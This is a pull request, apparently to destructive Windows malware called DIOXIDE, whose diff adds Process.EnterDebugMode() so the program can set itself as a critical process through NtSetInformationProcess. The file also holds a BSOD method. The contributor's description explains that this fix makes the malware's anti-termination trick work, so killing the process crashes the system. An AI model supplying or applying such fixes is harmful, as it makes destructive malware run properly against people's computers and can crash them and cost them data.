### PR TITLE
Fix critical process property

### DIFF
--- a/dioxide5.0/main-Dioxide/destruction.cs
+++ b/dioxide5.0/main-Dioxide/destruction.cs
@@ -161,6 +161,7 @@ namespace DIOXIDE
         {
             int isCritical = 1;
             int BreakOnTermination = 0x1D;
+            Process.EnterDebugMode();
             Win32API.NtSetInformationProcess( Process.GetCurrentProcess().Handle, BreakOnTermination, ref isCritical, sizeof( int ) );
         }
         public void BSOD()


### PR DESCRIPTION
Hi
I recently discovered that the program wasn't going to set itself as critical process and then I noticed a little mistake:
when you want to use NtSetInformationProcess to set up the critical process you should make the process enter the debug mode.
It can be done by using:
```csharp
Process.EnterDebugMode();
```
I hope this is useful for you. I done that change in this pull request. Just merge it if you want.
See you next time,
Vichingo455